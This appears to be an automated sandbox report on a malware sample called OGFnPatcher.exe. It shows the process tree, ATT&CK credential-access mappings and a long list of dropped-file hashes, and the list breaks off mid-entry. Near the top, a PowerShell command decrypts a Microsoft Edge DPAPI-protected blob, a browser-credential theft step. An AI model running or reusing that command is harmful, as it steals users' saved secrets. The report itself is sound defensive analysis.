C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,154,123,243,186,229,243,165,73,184,31,35,117,130,37,220,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,230,249,26,225,76,127,240,5,109,240,38,109,184,60,197,244,27,137,136,169,18,220,63,202,139,81,231,75,188,62,205,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,92,88,105,111,27,50,218,245,74,154,220,184,48,216,241,253,93,246,199,249,159,226,189,4,250,156,240,22,126,214,155,56,48,0,0,0,156,107,3,7,103,25,178,234,36,197,70,244,155,90,46,150,68,179,198,192,254,34,68,201,164,194,111,74,143,45,15,196,3,247,112,121,1,78,249,14,89,38,73,238,3,96,54,48,64,0,0,0,11,46,93,168,39,134,78,44,76,152,97,38,154,50,157,105,2,83,254,155,57,255,180,56,85,81,32,110,24,186,175,137,71,9,157,78,57,162,136,221,208,6,154,225,140,26,11,31,14,25,139,232,242,139,246,129,87,197,168,174,197,11,124,182), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:5168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,154,123,243,186,229,243,165,73,184,31,35,117,130,37,220,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,230,249,26,225,76,127,240,5,109,240,38,109,184,60,197,244,27,137,136,169,18,220,63,202,139,81,231,75,188,62,205,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,92,88,105,111,27,50,218,245,74,154,220,184,48,216,241,253,93,246,199,249,159,226,189,4,250,156,240,22,126,214,155,56,48,0,0,0,156,107,3,7,103,25,178,234,36,197,70,244,155,90,46,150,68,179,198,192,254,34,68,201,164,194,111,74,143,45,15,196,3,247,112,121,1,78,249,14,89,38,73,238,3,96,54,48,64,0,0,0,11,46,93,168,39,134,78,44,76,152,97,38,154,50,157,105,2,83,254,155,57,255,180,56,85,81,32,110,24,186,175,137,71,9,157,78,57,162,136,221,208,6,154,225,140,26,11,31,14,25,139,232,242,139,246,129,87,197,168,174,197,11,124,182), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe"C:\Users\Admin\AppData\Local\Programs\patcher\OGFnPatcher.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --gpu-preferences=UAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1104,i,18047690900480208470,11383549284962149404,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1496 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5824
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
82B
MD5770864f9ab141f49d41147944ef4788a
SHA1ec6fe92a56caa5d87a27720a0969982357634be9
SHA2560aebfd134ed56fdb205758befe2f6d7043b1710c6b0668c57f4484fcac233a7d
SHA512eeb0652dc10865f5cd859616c9583f9c8146deeef21700d492790372a3f391b3d344029e6c78017e67acbc106e7e0463e317288654ed69d17a508e6ecec25f1b
-
Filesize
19B
MD5c4efd9a7b61ebf43b608440be5e33369
SHA1926418256c277f1b11b575ec6e92ce6a844612f7
SHA256ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f
SHA5129ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745
-
Filesize
372KB
MD52bdd2eae92b695dd3f1022049798dd46
SHA12f29743b22d05fa832f6802188906452e4246fd5
SHA2567ad363db97ef4ed374ecac2bad2e02af87a19c0c6d50c810f48b49dd31e8561d
SHA5126a9acbaf99a165e851caf2b1dc5687280d82b5428f40cf082648c99d2477f3b373a02e543116f17946b4b0ce62817e60539e8891ddfab653fb3f50a4b9d48216
-
Filesize
14KB
MD51926f2962e53f2798d042469a12e4c26
SHA1306083be3104a900c47f76e65c1a553b3446f0c1
SHA2569cdaf6f4d17fa52ce32c791ee2a54783f8907b32a30054234b19477c2ee9bf59
SHA512d8a4d0b81846793b6f9aaef48c3a364e66dbdc0e8847a525c77e64756395ebe5f2446d43f944f4ab88da87bcaed9647920adda381f9ce80faf2b719a20324424
-
Filesize
522KB
MD53b6136828f17fada8ceb03280160bb44
SHA1dd2950b90e4298d88181aa403da2d51880b5784a
SHA256565379eb85e2fd463aa6e77a916bacec692c5ff79fb5e25fb5ace68ba2f9d890
SHA512bb66f75e5b2a1c5afd67c130942d62e11dd5c80eacc05769e96d00447dfb107dab1e549a83ffe4e638c2fd7eef4878e48423e505f84392014795469f0592aef2
-
Filesize
17KB
MD513ae06d329725323c4794fc4c7042e63
SHA18f8a833f75ff2887038308101dc093041c2e22d4
SHA2569a944ade36e64ae5db58ecdb350b502d889be81c4bf1125b5ba27a9eace713ed
SHA512ed268825c0570abd056b2c9680f88a85f13b47cbda931301c4f2c5c13eba47492dd3de251be5636b644ef1f8ef1b2a101b9ad803639dfd37a870b61c139d2567
-
Filesize
501KB
MD5b77481120595e6a73543d78f9d24f538
SHA18c3b27fd50d3b6aa5457e5fb6459b956533c743a
SHA2567abc1d867a628a3d0360efaa63039ca6a1c3145cbe3713fdd1acfd69e35bfee3
SHA512cabe6355afbe7eaf553de640222159dc76e8109b933356d1a9a2cb5821e3e9d9fccaeaaf8db8fc1c710b82f361aa0c76622c536d6ca0a19c9cfb82ff401ffd05
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD58e26941f21dac5843c6d170e536afccb
SHA126b9ebd7bf3ed13bc51874ba06151850a0dac7db
SHA256316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0
SHA5129148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62
-
Filesize
147KB
MD53c72d78266a90ed10dc0b0da7fdc6790
SHA16690eb15b179c8790e13956527ebbf3d274eef9b
SHA25614a6a393c60f62df9bc1036e98346cd557e0ae73e8c7552d163fa64da77804d7
SHA512b1babf1c37b566a5f0e5f84156f7ab59872690ba0bdd51850525f86769bfebc245f83988a3508945cf7617d73cd25e8469228974dd2c38415388b6a378552420
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD54d42118d35941e0f664dddbd83f633c5
SHA12b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA2565154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA5123ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63
-
Filesize
9.0MB
MD5f017c462d59fd22271a2c5e7f38327f9
SHA17e1bbeea6ac2599bd0f08877aa5811d32f1aceb9
SHA25640f314c778851106918aae749d75b2d913984327602a1bfb7ef0cc6443ff2a37
SHA51272177281486f6ec26ccc743b43481c31470c7dd53f17b0a67ac087dded190c2e3dde5570260150c2e9650186a515740af7f81e31965c95bb762340f9ac100c07
-
Filesize
222KB
MD53969308aae1dc1c2105bbd25901bcd01
SHA1a32f3c8341944da75e3eed5ef30602a98ec75b48
SHA25620c93f2cfd69f3249cdfd46f317b37a9432ecc0de73323d24ecf65ce0f3c1bb6
SHA512f81ed1890b46f7d9f6096b9ef5daab5b21788952efb5c4dcd6b8fd43e4673a91607c748f31434c84a180d943928d83928037058493e7e9b48c3de1fc8025df7f
-
Filesize
4.7MB
MD5a7b7470c347f84365ffe1b2072b4f95c
SHA157a96f6fb326ba65b7f7016242132b3f9464c7a3
SHA256af7b99be1b8770c0e4d18e43b04e81d11bdeb667fa6b07ade7a88f4c5676bf9a
SHA51283391a219631f750499fd9642d59ec80fb377c378997b302d10762e83325551bb97c1086b181fff0521b1ca933e518eab71a44a3578a23691f215ebb1dce463d
-
Filesize
2.8MB
MD5ed10fd2777a030b2895d2f555207f1b3
SHA181448e7a72e49eff746abbedea503139b7eadbdd
SHA256996aed5bb751d70e215bcc3e5be2ed28fb54412af05031c592df101b51232e0c
SHA512435f33fd11fc25a495726401211ed87771c831eab8916b8bb9520bf0f799646f911b22716f090849bfc85e2372cd28aa1c9de46f9d613929993ef009955173e9
-
Filesize
10.0MB
MD5ffd67c1e24cb35dc109a24024b1ba7ec
SHA199f545bc396878c7a53e98a79017d9531af7c1f5
SHA2569ae98c06cbb0ea43c5cd6b5725310c008c65e46072421a1118cb88e1de9a8b92
SHA512e1a865e685d2d3bacd0916d4238a79462519d887feb273a251120bb6af2b4481d025f3b21ce9a1a95a49371a0aa3ecf072175ba756974e831dbfde1f0feaeb79
-
Filesize
473KB
MD5e3f6c7b1316f7ca06ee178377ce16ff7
SHA1f546da89ec0d3ef238892be8f2dd697d411518bb
SHA256ff6d4f18492a704b4b9d853abdcc73a4fa561b0c685619508e25afaf4e4800b9
SHA512cad4026efc48192c4904a4b0ec583d2e24b94f8a5f91824716eddb32477512799b10a4f9cc7a2976a25ca0d333bb1c68bb98b1d0f9bd7020e0e31be7d950720b
-
Filesize
8.0MB
MD5ac216b22cb7ca21d9803ae6b111792e5
SHA1f6678626aa522628110315889ca744572549bb73
SHA2563cd10952ba73ba4a36f5ec92dcbb0893092bfc8d77a381f6f9f3090b0ecfbb50
SHA512df344f79ff5d4e38b451bea948c234b63af0402565097082a082b44a4efb9e0ed367884875cbc817237b7ae7ac126fc7de0e8615504923b8db553c1a3a985a90
-
Filesize
508KB
MD509455048c30cecbb17d6e0e95e4c01da
SHA16572850b07df45933ed57754f72c44895a7ef662
SHA256e973763dcc0ffd7a5afe0a62ec9651c4c3db7fe29a23797fafc34b83512d03aa
SHA512f59b68c213815ad81379c964abe6597b900b9fac5fe17e2cb378d015c4803f96b598ef70333d594599b3283a88a9ca9cb2475afc2590eda2ddf7b041ba2368e3
-
Filesize
822KB
MD599f01e85f82f70b919f3de6a29bc2255
SHA1bd229bbb9a15d128d3dafb107533ed2b74e0b778
SHA256fdbbf59c2f6d4e9d6bf8bc7209511850bb337b0a49a25d39779bdd0e105f1682
SHA512b3b7199f60af430bc98fc937e12b0a2c67b446f0217e01b543882313336f55def3cc6317cf1ef49766ceb1e171e70cbd78e8acecc3cc1c8409e76f4d98d347a6
-
Filesize
901KB
MD55fbed215d9555f2be88e8a41407a0a72
SHA1744bd7b5276cd4e69a6610d35e3c9e5d62dbe49a
SHA2565f1b06de1f8105ccebb79651781fc219013048951a6e1b15a2c4f567ee45e88f
SHA5120c0d2d1d3d07528afecf1862011ce2ddd27c9c286b5edeb03cd80a9ffde584bf0a71ba6292c969e3261a958a9bfddd291746253268479c090f54559720dcac36
-
Filesize
938KB
MD578209e3acd074e521b73382ec462e497
SHA1b112c4ced00c140410a1faf8204772d1fd14abed
SHA256086e2955bc5dbba52b0ab055bf788bd7852a851a29bf1249dbd134713f04e6f4
SHA512789f13ba6b98b0b181bbd75f3a099a39d33b43bd6a0172688da570c3087cdbc4975e36e5c40f0f3298648dfb777613b0b2001d6873a2c6bee41e82355d960fd9
-
Filesize
1.2MB
MD5ea7cf62cd5373f016ee15773394cc33d
SHA1582299514e86802707fd6e45a170da7a5b5f3da0
SHA256dedf3a8c24b13eafd99d9bc44dfc4d7a74f01eda532e05c8d61b4457f348fd09
SHA512482ce2f374e5bba511e60843736811ab1f8d3aa52a020c78505e95b1ad0a924531a952ff792116ef7ef55cf027640ac88885f13513757c8883b37d7ae57c9a13
-
Filesize
571KB
MD5d4f81d8d816d93e8e6ec3f82cd8f12c4
SHA12cc552022a6963f6bab97e41ecd78bb945a2ec34
SHA25650657071f311dc06c746346a25d10642f182519c1eb3ab898421722271bf2c66
SHA512b344d5b336699f5efa4e235c7f67ea43278b348df9942f7a86ac52e29172794672d71e80501987867900ca075be0e47228f6cb898a39b66c80acbd0d9b14b371
-
Filesize
589KB
MD5bb1c4ba9859b0a43a42021f39b8b750d
SHA102b2505d3955f15b6655bee9c92d7bbfaad6ddc3
SHA256814990ab6af4acb4acd44b0f07fafd4375724facf4e3080014ce7b8b9e935fb9
SHA512941cf4d334dbea7cc790cb8ba11e959d5a45381e7efdbae1e659d27540fd80247bb71820a90af6164d76cabbb283dbf3b652c29e0ded3832dcc21e3a88f7d0b6
-
Filesize
533KB
MD596bbef1eee0b0a197ec834839c00e11c
SHA135adba0aafbb4d19015e11dde1f37de87292252d
SHA256600e02877374dc083b21deb3cc3bf6a4e3e2b2c581a631955494b0591c56289c
SHA512e1ae7ad30735b6c42f81d30d50162330603753b0ce7705506918d0bf3bf9a52ac60f8fca570cdfe87f0d6dd46cfa3064d5a1526d39d81a053571b434b1cbffe1
-
Filesize
569KB
MD5d847de7e4970ad17615f7a454be60d06
SHA1e6cd24f4ca42499c12c92f90077977921a66e016
SHA25641e503b5e5638cccac6b0165d6c2d2b583e3a6190f3b1dd2e8dd25494d3bdf96
SHA512ab782cdf2fcf20d24cb3cb3c70989901146709610809a3ecb0ba86b312f11c5b1fca3d66b04d6a6ad3f111f2f2c8749da9d1f8d1ead08c8e7635bd6f1f6a00f0
-
Filesize
1.0MB
MD514f52763959d29febddbe25c86336e70
SHA1dbde678a721d4fba97d5bf2703faac230794128c
SHA2567134776724c07c2df17f6ba0c3c26a2a536d512e913d1d9c5585e600895e695a
SHA5121f49a299a9fe76ab93a30ac17e1bbf3eddb20c6278740d7739e0044f867f35e65a0cd98654ab0ed60a43e268eb7258768cb8f35a254fbf31bf22ff4af7c3f96d
-
Filesize
463KB
MD5513c735f8821cd5b8beee4f1c9f976d9
SHA12552ec0b813aa12b464d813d450e8b6bbc640555
SHA256d86bc52d844b9706cf9fc50e7c123ab9a6372dd3190a65a88bff7d57f64af362
SHA5129482f73155c0a838615ddeb4ea5e2db86f12d973c2288922f361de27025f49f714cb6db6eca09a4ef6abaab6b849800850fc72e5bd1314ad3262da66d4dc6b5b
-
Filesize
467KB
MD5d47cded365a28d27906414035c1cb3ca
SHA1429123c86f6ca48a89bedc9a26027e01508e6db9
SHA25646958caf9847e33a11593ad024d5a95cc696edcd4620cf07e7b2b78c72b9c00c
SHA5121a16d784913fead116460c9ff42e21ae482865cfe2d6ed1b1296496e46a05e513f8d048fa4d245e7a82ef61de4c4130696d5b1c647c918995f6877a888bd0853
-
Filesize
562KB
MD576c82bd947c7d32febb2aeed079de39f
SHA1e4b8238dcb0d3ffdedbb8a4fdc62ada21b03c659
SHA25689df263a85ccce719cf2b1a5bfb3b2bec5f6f48d0cf1b7ad190b34992aa8309f
SHA5125179f1cc0be2a4ad441c08102cbabdd3026ae07f430dfeac2f451863235947d9ff1ef78a8c72ef503085c8daf831b401a58ca6e6b077c7584c50b50005c7c868
-
Filesize
562KB
MD5070cbd6f42db1cb9b6a2f74e03d6b124
SHA1f8830e1c8a601123d85fd75188ed01833f910691
SHA25691de93a4dc9c9276b9ee3ae498bdafaa55fd464c1f20fdaca84c4b79842327d4
SHA5122ebee4e289eb2a19a97c86d1abdc1ad53c6a76b8c1dc28fc89cfde236c4abfbb823bf52573cc0848fd76ed9e0ab2d49def542837bc5c474ca1593fb5ed10a390
-
Filesize
511KB
MD596febc2a296af99758050eef3ed97712
SHA126f8751ccfe0b1bed9db532dbac1034a02b7f48a
SHA256678e50d9785c14f205baff60760decf64f765a98863e000abe44dcc6f22b5d0d
SHA512bfc8a9051360338c61dc46040b006808b57ee20ce170c4645bf5fd83a643c3107bbc1752fd2486a9ab8250a84ff0cf832f381c523cc49cd08486eae489c4d45e
-
Filesize
836KB
MD599ce096115521566ffc685703f9cdbfd
SHA127cccf6b8f6939d17da4b884998e577392b97221
SHA256645a43a0101eea39dc6b29ffd71a4836a03ebd7070e61aa962025257aea59375
SHA51242df640778ae722b82a62e527711a57c883e9d315d54ea7e484d7a8f631abf3f5ea1498d6c5cbd004fe971fd357a0b8d40ab4934fc84e03565da3fb0b23184c8
-
Filesize
521KB
MD515b4ed60de11e5fb956d624032e8b242
SHA194e7f2b7a62c4164511be53d59769299b8a02185
SHA256f040febcc899b194a6908419b4bc225ed3d53ec478988ed7a50e8438c80d9606
SHA512c67e22f75820b921f8519ddf064a0fd7d93abf0539b06a62592ad00ba9cc237b1297acf5eba15f7e1444916e90c9dc89e116704866d242d1bdcf0c90cb8c0058
-
Filesize
590KB
MD54462eeada117fea1198a3a9cc370e8df
SHA1c8b6f588ab35f485b88480e58db59c7a34c4ef0b
SHA256db27ebc5b34d14be370e7068b4bab4fe12fdf090bc1a4f0bad81740aee974695
SHA5128a69a11f33ce1fdccb3aa7b1dac981f9d6c9d64669e3f97265bef5862e20bbc62d568b8e64fa33cae3143096b009ecb904f0f32f6dc593a8702f94d4e3f52d20
-
Filesize
608KB
MD51904b22bbb5d52255f80c541253971ba
SHA10ead9bd15bd115775728a6cada2136367fe34b87
SHA25625eb9ea0d0007b5d4c5065fb77486c723d718a1496aa52013d1ea098987f44d0
SHA5126d4f4a9dde7d22624ef3c28e4cf4a8de8255125aca0c5efca0bae69f040aed2651649f415acdf491593634adce0e4d88ee6439705115bfec25caae34a57f1003
-
Filesize
1.2MB
MD5cd212ed25482d2b5a246440b62c4fbbf
SHA1197f3616dec4fb308e0ec5a17458ef8a2d027cd1
SHA2560e8762ac08963088c33b74ee790df95370bbfc298bae8abfb87eb1307ef46d37
SHA512207d3e9a6bfbd3eb19cf53a0a300eb0172ecb872496d627ac5b55b9ea11d52f24f01393893450fefaa3c42bb481129d54e552679f2f67a2af0e117d12464601d
-
Filesize
734KB
MD541227774510c0d2ea4637dbffe500000
SHA13d8a20158dee92d5b5ce1a2c852352a50ae62282
SHA25690f11a1c09fcc4a5fd5d6f753bea04af93ff8ddf4372a5f84a15fc2ccb444c95
SHA51240e8a5d8c3e1b481074da9bb48ad82a64849386d9512ecee8fd426d6def32a8930fab316e3c5d686d7706b6bc975913d7d75e69a0c150b74dc8bb45620e82140
-
Filesize
1.2MB
MD5cbf1e19ed157d39bfe70a17805ea3cc3
SHA1e37f6f428e8478f50999899ce70f49e60d2fd758
SHA25600670d07269facbd70e3949f3da5a73f584e08a6e901ac8a3b1767fc439c975a
SHA51284f8af3ef49c8f970e7ac2ad61ec92fc21057767afb93116fbc11837b6d7130901245bcfcae53f158f6f09f3a8e59900a6444a5ba9364b2c38196631c5244258
-
Filesize
567KB
MD562bda7cc99b6dc1503332e752f87423f
SHA10187ca29d12971ce201d5513e45648898806d701
SHA2564171bbd2229ed5a7638b74e32d7aa0e643cbc99051d92a80e7da5a31400ae69c
SHA5126acdc6618bfb1d2ba7ce912f959c25a48f987dc6c6507c8c5bac22988ddb8b2cbb8aca8fc3d40b2e8b7b6fbd417bde2de34b91b8fc778ba78c182aedb722be06
-
Filesize
611KB
MD51744609aa48694daf1058e6da1157696
SHA1a97ba8118e91bb952c24adf19104ca54d4eb8694
SHA25689c47beea85d50c88af6f94597f827bfa657ec73570cb4b3ffbc3ff91164ba89
SHA512f64c8fd18f877283bef39c999f754ddc212fc8ba981d282f66443c6fea51e89a5c4a2aa37aae7b69c35a60bdf9b8f5698d2cc72e28e10d70747ce0f7d665ce8d
-
Filesize
505KB
MD5ee466128c7bd5f01d518d0c3c9202f39
SHA174b7cb96c1e495885651e50907efe56d2567955f
SHA2566f86ea779e49c8eb24ed6ba416ad67d5e08f8a3673c68e4cfad19475e12a2911
SHA5129d88780e52c1cca9f89ed0ead244a763209848d1315f7177c1db3251214d363e78b32d439328304976804beb781fd07a0cc9f9e300431aca16ae6afaa6f57be6
-
Filesize
554KB
MD5d26fd02972984599d1a60ebfce4ee7b0
SHA1d1767c68628c8b1449b4670fc40c355d367b0a97
SHA25675e90045cdafecc013f62097e1aabae18362954cf993eb4f78ed1639e3468186
SHA51206722bae30ade4bae70130918e3d6f99e54d7fca37b3798f8ed3d269cf52c37e1280a08313c9f9dedac80da149446bd0414cd36e345bfea3a1b7409b7d2f3464
-
Filesize
675KB
MD5946afe803f1bd37cac8cefb9892e8387
SHA16a5ab4129843129ff926735acc4be53028a8d5bd
SHA25691084c3d2709fed5c912fd55b2499c394b3a8ebba5032d03056845f88a141ffa
SHA5124bbc76a738b9639d4a2fda9e1dc87c84bff660c84a01e3a54f544ec2421d20d9eee4c951a59ff8ed5950a00359bfb63ef1afe953b5cf5910923428a4d864ad71
-
Filesize
1.3MB
MD5e4865513d7c57bd48171ade28bc4aaa4
SHA11791131c3fc654bc0aef00927f41672f700720d7
SHA256a1b23f794547f06510adf767b23a47df68ae864b059f8657bb78dd8b352de232
SHA512c7487fb37ebb2108218021b6a93e62d6836248d1602e7847864cc0ebe7fcd87554220bd3fff0c7bd6fa6f7bd200811b8d30e421b76717e37c7e110f88cc40d15
-
Filesize
572KB
MD5f0805980b4bba19fd7cecdae6d6ed77d
SHA1fee432cc162890c5c8d22f6028f9086c8f47267d
SHA25611f4f99e5f7d04b263f615d9d0716c0852b8c63a07212d14604373853aa78588
SHA51203a97e36dbcae88b0fa9fec326bd99bf5c454889ca3bcf151b34003fac161001c1e08082b07974b6c8e01cc54f6b20f810c3bbe446494356403288e24e6b46df
-
Filesize
615KB
MD5b02bf54687716b5d5f18aee02411a980
SHA14cf766077382c49fb89d59d861de0f482f989798
SHA2560b0e3fcb82ddca52f9eb1ff9e1ee224639ff81f1c0af6ded4e21944811babc0b
SHA512aea879ac96a5719e8988011a7b82726bf51a24e170e260182146191f43914cd50991928d2283277d173ad650f7cfb1246fad9445260e9ca0769052079d431f25
-
Filesize
614KB
MD5df9985ecfc958f343ab7e56e71149d71
SHA1fc0d2c4a194d500a1f4cfafcd9102186016ba5a3
SHA2567e17246e23ca2d0241d56d91b5d5e6bfb3ff4e08f1a3734f9d032b4191282fa2
SHA5120dd65eed7a5bccee0ac5e2826f0cceed848dff0d0d41904e00d35cec9d96fc0b91a4eb54fbcf0bbba61f89848562a606f9f7aa827cb180abe7e97a2e77a29309
-
Filesize
1.4MB
MD5265d7fbee9a021895d51209dc0181f90
SHA130e37013971bacd3ee93ad2fca01cb59a26d6a87
SHA256682463d4a0221711e565ecf409893536d727650efd2ed0563c722cceab66b1ad
SHA512028e1ad499b20ff7cda822b91f9b8d1cbb1efe108b7236d817b73a6f8e518b5f4a8ae77d653ae5c9d799842eaee3915250ef56f634f847fc5fc8a3b36eea176c
-
Filesize
1.1MB
MD5af7c7d72a968e1936f26a3c755157f6b
SHA12ec71950847f5fb4b85697b6acd05224c28bb092
SHA256e5702b9578435abbbcc922f1d4ff8c5a345856926c2174c329e228987c3ac7d5
SHA512d265eeee96adafc3ced76901c9263bc1cb349caf925a02d5deb010c02843fb653a17e1e8a4e942c9912f654316c4a7a1776e6a7eda56ab82ae9d4d077a58a929
-
Filesize
528KB
MD504f12811567c0f00bb35b488f4579425
SHA164f43b7b172e392daf1fe48e22324fd8dc2a3924
SHA2561af4b9a66ca413dc3a0785f2b1527c237bdd05ba5768fe077aaf8af0f1c50dff
SHA512a03fd120e9f31aab03fece30032f84b63060d5dd264e0bf04c85eb92a392d36a0c4122817b0d414a266305ad70efb067319aba38e100aa8c37ab65c3604c4ea6
-
Filesize
512KB
MD5bc18e28f676138795d19d95e73e3f246
SHA1f4ae51b49a69b4a32f2dd8c09784ebde1e6d018a
SHA2561df78fd35431f167def5c496e441775a265d3eb1e64a4cc0fb7fe0201c1ce8b8
SHA5123620554d7e614373038c278a7bc6a9388fb66abbeba28d0935f2a2f7203a8510b264a6df85e70e3b82e08588611e48a64e4e1c91470f72c95c05cfb8649e8c52
-
Filesize
530KB
MD5f4c35847247ff2c58a68c35718e3f358
SHA117f8af1473eb3bf8bdb3d16711bb359b59cbaf4a
SHA256a400121adbb26c97a95e3f573f370ec2c37fd435132828c04b467dac47352904
SHA5126179e275c71a9df4a7da517944048a782a2cb3f16c164ead8c788efc5c56e155c9770530a4fea9360ab478b78c233e183ee8afdf17c8cb871848b09a609c1f12
-
Filesize
591KB
MD58cea9672f132573e143fc742ff1f7d00
SHA12eda91defa08ac7d27c082e4b85120d347dd39ca
SHA2566257145654f4e47c21ef2b91fe69fc386c1e228a89a658418532a2934433cd7b
SHA51225579e0535569f0a2855d02df0e2b36dc391a0d3cc54d2ee2b23184836caf8a3ec4c590704a9604666307e1e6e01d72311f76bff7210cecf18ab20d4f3c309f0
-
Filesize
555KB
MD575d9da45b6a34aed360c0897dc956418
SHA190f15ceb5cf0cbaef021de42acaae323c9023cb8
SHA25677d29b746b4028ae7072d5f74ffe1cbdc66b180a36eeed71e52ef1f7b824cddf
SHA512df2d0ef49e4f836d5209f53254cb58b76d13a36eee14ae559f6fbe0be6b8421cde4152f48d44997c81ffb32e089ea46bd4a9de85e1bbd12dfcdcb356f1798629
-
Filesize
558KB
MD562071f5b1b93161b03b66faa3e0ec71a
SHA1969d82d8d0b2b82e7cb9af7f59825ba211b0ca8f
SHA256953f8245585ebb637b2d2134b24118f2baa9c28211ea007a8605fa57c7df21f5
SHA512b463844e7d620076a4cc11d5ad3e9aae52f0375f5eea16f5621a30043ba570baaf3c42050bff7d740eb9bd8274c190787a9d7d57bcffddba62eaaa8b7c4523bb
-
Filesize
579KB
MD55d5a27c52ae905fd85f5d50cb793e7ca
SHA1b858bba1ef66c4d3943be19a4bf8a508c23e6671
SHA2569ff47f6890b3f543bc51015f263e791d8a3bc332098f8cd8199852fa131fa579
SHA512f4754951ff0dd3f1ec2c0859a93422330145f9e4e3407bb7f95863c85227b96d3f8af449c0a051b60f333df3695eea5df70fd5f7fe4916e60eb6f7c4c21aa5e2
-
Filesize
951KB
MD58243216c5cf42451a8705fdc0a5b8b5c
SHA176decf1dfffdc775c5b285436573c8583f214119
SHA256f6538645321dfa0f2ee3f17284ff72800f6a678df3f5b7d729d02a4496adcce1
SHA512508c9b4d81b9d09a1306dfe707faaac9072d2c194ccddccbad2bed871c68a78a3e8f527fd8f9ee67d08f6147def43ac2dc43deed9797a98cb5d80c0486fbf8ad
-
Filesize
598KB
MD5f987110e03dff6a6104d3c9767139439
SHA10817884ab9064978de99909e7e376d067019e1b9
SHA2564fabe714236712d691908751b42e947fb03a4b1a439e7a84335e7f18f87625e3
SHA51291a609fa129394ae23590c72a6007bb6591e4e08342ff0d6ba184c8eb09413ed294ca15f13b92f7558823523a0272f5af6841d7e426177c803be1062f9842d9b
-
Filesize
574KB
MD54072bad3315b78fd05787a9fb97e9af6
SHA1267209a3bde1b362351ea473874d5d40d9ef30ed
SHA25610676c91bac7b80d314a1d7a934bebc5104ed730bd4eb78d84c497f7e07b5510
SHA5129a858d4d11f7476b030f3c9bb852a70ae501f34afa0eae2756f2ad59d8dab9983a4b5dffa11b9b7eb578fd52b3ed72094b807b82b93b4c4536ce59309fc0fab3
-
Filesize
883KB
MD56f327ce1d0e7131c483be9ee0c6a1c21
SHA126da43c4b16b6b0e2de9a8ed85cd63c202acf00a
